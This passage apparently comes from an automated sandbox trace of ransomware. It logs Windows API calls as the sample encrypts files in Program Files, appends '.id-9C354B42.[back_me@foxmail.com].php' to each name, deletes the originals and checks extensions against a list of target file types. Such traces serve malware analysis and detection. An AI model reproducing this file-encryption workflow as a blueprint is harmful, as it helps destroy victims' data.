lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x851c, lpOverlapped=0x0) returned 1 [0052.446] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x8520, lpOverlapped=0x0) returned 1 [0052.448] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.448] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.448] SetEndOfFile (hFile=0x194) returned 1 [0052.448] CloseHandle (hObject=0x194) returned 1 [0052.448] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.448] SetEndOfFile (hFile=0x198) returned 1 [0052.449] CloseHandle (hObject=0x198) returned 1 [0052.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1 [0052.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.450] lstrlenW (lpString=".doc") returned 4 [0052.450] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString=".docx") returned 5 [0052.450] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.450] lstrlenW (lpString=".pdf") returned 4 [0052.450] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString=".xls") returned 4 [0052.450] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString=".xlsx") returned 5 [0052.450] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.450] lstrlenW (lpString=".ppt") returned 4 [0052.450] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.450] lstrlenW (lpString=".zip") returned 4 [0052.450] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.450] lstrlenW (lpString=".rar") returned 4 [0052.450] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString=".bz2") returned 4 [0052.450] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.450] lstrlenW (lpString=".7z") returned 3 [0052.450] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.450] lstrlenW (lpString=".dbf") returned 4 [0052.450] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.451] lstrlenW (lpString=".1cd") returned 4 [0052.451] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.451] lstrlenW (lpString=".jpg") returned 4 [0052.451] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.452] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=32146) returned 1 [0052.452] CloseHandle (hObject=0x198) returned 1 [0052.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 0x20 [0052.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0052.452] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.452] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.452] GetLastError () returned 0x0 [0052.452] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7d92, lpOverlapped=0x0) returned 1 [0052.455] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7da0, lpOverlapped=0x0) returned 1 [0052.457] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.457] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.457] SetEndOfFile (hFile=0x194) returned 1 [0052.457] CloseHandle (hObject=0x194) returned 1 [0052.457] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.457] SetEndOfFile (hFile=0x198) returned 1 [0052.458] CloseHandle (hObject=0x198) returned 1 [0052.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1 [0052.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.459] lstrlenW (lpString=".doc") returned 4 [0052.459] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.459] lstrlenW (lpString=".docx") returned 5 [0052.459] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.459] lstrlenW (lpString=".pdf") returned 4 [0052.459] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.459] lstrlenW (lpString=".xls") returned 4 [0052.459] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.459] lstrlenW (lpString=".xlsx") returned 5 [0052.459] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.459] lstrlenW (lpString=".ppt") returned 4 [0052.459] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.460] lstrlenW (lpString=".zip") returned 4 [0052.460] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.460] lstrlenW (lpString=".rar") returned 4 [0052.460] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.460] lstrlenW (lpString=".bz2") returned 4 [0052.460] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.460] lstrlenW (lpString=".7z") returned 3 [0052.460] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.460] lstrlenW (lpString=".dbf") returned 4 [0052.460] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.460] lstrlenW (lpString=".1cd") returned 4 [0052.460] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.460] lstrlenW (lpString=".jpg") returned 4 [0052.460] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.460] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=39515) returned 1 [0052.460] CloseHandle (hObject=0x198) returned 1 [0052.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20 [0052.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0052.461] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.461] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.461] GetLastError () returned 0x0 [0052.461] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x9a5b, lpOverlapped=0x0) returned 1 [0052.463] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x9a60, lpOverlapped=0x0) returned 1 [0052.465] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.465] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.465] SetEndOfFile (hFile=0x194) returned 1 [0052.465] CloseHandle (hObject=0x194) returned 1 [0052.465] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.465] SetEndOfFile (hFile=0x198) returned 1 [0052.466] CloseHandle (hObject=0x198) returned 1 [0052.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1 [0052.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.467] lstrlenW (lpString=".doc") returned 4 [0052.467] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString=".docx") returned 5 [0052.467] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.467] lstrlenW (lpString=".pdf") returned 4 [0052.467] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString=".xls") returned 4 [0052.467] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString=".xlsx") returned 5 [0052.467] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.467] lstrlenW (lpString=".ppt") returned 4 [0052.467] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.467] lstrlenW (lpString=".zip") returned 4 [0052.467] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.467] lstrlenW (lpString=".rar") returned 4 [0052.467] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString=".bz2") returned 4 [0052.467] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString=".7z") returned 3 [0052.467] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.467] lstrlenW (lpString=".dbf") returned 4 [0052.467] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.467] lstrlenW (lpString=".1cd") returned 4 [0052.468] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.468] lstrlenW (lpString=".jpg") returned 4 [0052.468] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.215] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=29790) returned 1 [0053.215] CloseHandle (hObject=0x204) returned 1 [0053.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 0x20 [0053.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.216] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.216] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.216] GetLastError () returned 0x0 [0053.216] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x745e, lpOverlapped=0x0) returned 1 [0053.218] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7460, lpOverlapped=0x0) returned 1 [0053.220] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.220] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0053.220] SetEndOfFile (hFile=0x1bc) returned 1 [0053.220] CloseHandle (hObject=0x1bc) returned 1 [0053.220] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.220] SetEndOfFile (hFile=0x204) returned 1 [0053.221] CloseHandle (hObject=0x204) returned 1 [0053.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1 [0053.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.222] lstrlenW (lpString=".doc") returned 4 [0053.222] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString=".docx") returned 5 [0053.222] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1 [0053.222] lstrlenW (lpString=".pdf") returned 4 [0053.222] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString=".xls") returned 4 [0053.222] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString=".xlsx") returned 5 [0053.222] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1 [0053.222] lstrlenW (lpString=".ppt") returned 4 [0053.222] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.222] lstrlenW (lpString=".zip") returned 4 [0053.222] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.222] lstrlenW (lpString=".rar") returned 4 [0053.222] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString=".bz2") returned 4 [0053.222] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.222] lstrlenW (lpString=".7z") returned 3 [0053.222] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.223] lstrlenW (lpString=".dbf") returned 4 [0053.223] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.223] lstrlenW (lpString=".1cd") returned 4 [0053.223] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0053.223] lstrlenW (lpString=".jpg") returned 4 [0053.223] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.348] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.348] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0053.349] GetLastError () returned 0x0 [0053.349] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x319e, lpOverlapped=0x0) returned 1 [0053.355] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x31a0, lpOverlapped=0x0) returned 1 [0053.356] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.356] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.356] SetEndOfFile (hFile=0x1a4) returned 1 [0053.356] CloseHandle (hObject=0x1a4) returned 1 [0053.356] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.356] SetEndOfFile (hFile=0x1b0) returned 1 [0053.357] CloseHandle (hObject=0x1b0) returned 1 [0053.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0053.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.357] lstrlenW (lpString=".doc") returned 4 [0053.357] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.358] lstrlenW (lpString=".docx") returned 5 [0053.358] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.358] lstrlenW (lpString=".pdf") returned 4 [0053.358] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.358] lstrlenW (lpString=".xls") returned 4 [0053.358] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.358] lstrlenW (lpString=".xlsx") returned 5 [0053.358] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.358] lstrlenW (lpString=".ppt") returned 4 [0053.358] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.358] lstrlenW (lpString=".zip") returned 4 [0053.358] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.358] lstrlenW (lpString=".rar") returned 4 [0053.358] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.358] lstrlenW (lpString=".bz2") returned 4 [0053.358] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.358] lstrlenW (lpString=".7z") returned 3 [0053.358] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.358] lstrlenW (lpString=".dbf") returned 4 [0053.358] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.358] lstrlenW 